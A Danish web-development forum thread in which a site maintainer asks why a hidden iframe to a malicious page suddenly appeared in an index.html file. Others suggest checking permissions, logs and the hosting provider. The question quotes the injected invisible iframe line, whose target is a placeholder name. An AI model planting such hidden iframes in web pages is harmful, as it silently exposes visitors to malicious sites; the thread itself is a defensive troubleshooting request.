Oprettet tor. d. 04. marts 2010 kl. 13:07:41

30 point uddelt | 3 kommentarer
snigeren
snigeren (15.048 point. Point ude: 0)

problem med malicious link i en html fil

Jeg er blevet bedt om at finde ud af hvorfor der pludselig forekom et link til en malicious side i en normal index.html
foran
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/ (...)

stod der pludselig:
<!-- ~ --><iframe src="skidtlink.php" width="2" height="2" style="display:none;"></iframe><!-- ~ -->

har fjernet linket, skal jo nødig sende nogen ved et uheld ind til noget skrammel!

På serveren kan jeg se følgende:
mappe scripts:
expressInstall.swf
swfobject_modified.js

en mappe uniflip_publication:
uniflip laver en brochure med vendbaresider...

i roden:
6 html filer (de 6 sider på hjemmesiden)
og alle .jpg .gif og en enkelt .pdf artikel

Kan ikke finde nogle textfields eller noget så vidt jeg kan se ikke noget admin login...

Nogen der har en idé hvordan det kan være sket?
Anmeld misbrug
Skriv et svar | Skriv en kommentar

Skrevet tor. d. 04. marts 2010 kl. 14:44:24| #1

zips
zips (31.437 point)
Hvis du ikke har nogen filer med et script og du har chmod dine filer så man ikke kan skrive til dem, så er det din server som har en sikkerheds brist og du bør derfor kontakte dem om det.

Har du nogen log filer på din server, har du det, så kik dem igennem og se om du kan se hvordan de er kommet ind.
Anmeld misbrug
Skriv et svar | Skriv en kommentar

Skrevet tor. d. 04. marts 2010 kl. 15:08:37| #2

snigeren
snigeren (15.048 point)
index.html har CHMOD 644 så det er kun "owner" der kan skrive til filen er det ikke ok?

Selve mappen hvor siden ligger i ligger på en større server og der er givet adgang til den mappe så ham der har lavet siden kunne oploade via ftp. for han skal ikke have adgang til resten af serveren.
Denne mappe har 775 dvs. det eneste der er disablet er write for public.

Nu ved jeg ikke hvordan det fungerer når man opretter ftp adgang til en bestemt mappe på en server skal den have den CHMOD opsætning(775)?
Anmeld misbrug
Skriv et svar | Skriv en kommentar

Skrevet fre. d. 30. april 2010 kl. 18:40:17| #3

Accepteret svar!30 point tildelt

Skriv et indlæg




Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] [img]link til billede[/img]
Web- og emailadresser omdannes automatisk til links
Se preview
Opret

Log ind

   
Opret bruger | Glemt adgangskode
   

Seneste spørgsmål

Hvor indsætter jeg Favicon?

Oprettet den 11. februar 2012 kl. 17.44
a/s giver 200 point for svar | Giv et svar »

POST ændrer formattet?

Oprettet den 11. februar 2012 kl. 13.33
djthomsen giver 100 point for svar | Giv et svar »

de 2 form ligger ikke ved siden af hinanden

Oprettet den 10. februar 2012 kl. 20.31
tobrukDk giver 10 point for svar | Giv et svar »

Seneste guides

Installer win 7
9. februar 2012 kl. 14.11 | Læs »
Installation af Apache2, PHP5, MySQL5, Phpmyadmin og...
8. februar 2012 kl. 20.05 | Læs »
Den hurtige og effektive metoder til at knække...
4. februar 2012 kl. 23.16 | Læs »
Guide til usb internet også kaldet mobilt bredbånd
4. februar 2012 kl. 22.33 | Læs »
Den gode bruger
30. januar 2012 kl. 04.45 | Læs »
   

Seneste nyheder

Måske snart slut med Androids helt store problem
10. februar 2012 kl. 13.40 | Læs »
Her er fem sjove danske websider du skal kende
10. februar 2012 kl. 13.31 | Læs »
NemId sprængt: Hackere bryder ind i Danske Bank
10. februar 2012 kl. 13.06 | Læs »
Danmark kigger langt efter musikbranchens guldkalv
10. februar 2012 kl. 12.20 | Læs »
Nu kan du snart hente Windows 8
10. februar 2012 kl. 11.41 | Læs »

Tips & Tricks fra PC World

Teaser billede

Her er fem sjove danske websider du skal kende

Trænger dine lattermuskler til en omgang fitness på dansk? Vi viser vej til fem websider fyldt med humor og vanvittig satire.

Læs mere »

Anmeldelser fra PC World

Teaser billede

Test: Denne super-tablet er iPads hårdeste konkurrent

Eee Pad Transformer Prime er frygtindgydende med sin quadcore processor og evne til at trylle sig om til bærbar. Apple bør kigge i bagspejlet, for Asus' tablet-pc kommer buldrende - og gør det...

Læs mere »

Seneste blogindlæg

Teaser billede

Tvangslukke spørgsmål: Hvad er den bedste løsning?

Hej Vi har mange åbne spørgsmål på Eksperten. Vi ville gerne tvangslukke dem - så et spørgsmål efter f.eks. 6 måneder lukkes. Men der er et par uklarheder som ville være gode at få lidt input til:...

Læs mere »

Nyheder fra PC World

Teaser billede

Nu kan du snart hente Windows 8

Den nye offentlige betaversion af Windows 8 er klar i denne måned.

Læs mere »

Nyheder fra Computerworld

Teaser billede

Måske snart slut med Androids helt store problem

Android-platformen har længe været plaget af et særligt problem. Men måske er problemet nu ved at være elimineret.

Læs mere »

Kurser
Lederuddannelse for it medarbejdere
Word kursus 2007-2010 VBA Programmering
Adobe Photoshop CS4-CS5 Udvidet
Microsoft Certified Technology Specialist, Sharepoint 2010, for ledige
Microsoft Certified Systems Administrator for ledige
Cisco Certified Network Associate (CCNA) for ledige
Lær at anvende WordPress
Microsoft Certified IT Professional (Windows 7) for ledige
Adobe Photoshop CS4-CS5 Grundlæggende
Internet Explorer Grundlæggende
Alle kurser »
Samarbejdspartnere
Ferienhäuser in Dänemark.
Webhotel
Bærbar
Computer
Digital TV fra Viasat
VM fodbold
Udgiver · © 2012 IDG Danmark A/S · Hørkær 18 · 2730 Herlev · Tlf.: 77 300 300 · Fax: 77 300 301 · Brug af personoplysninger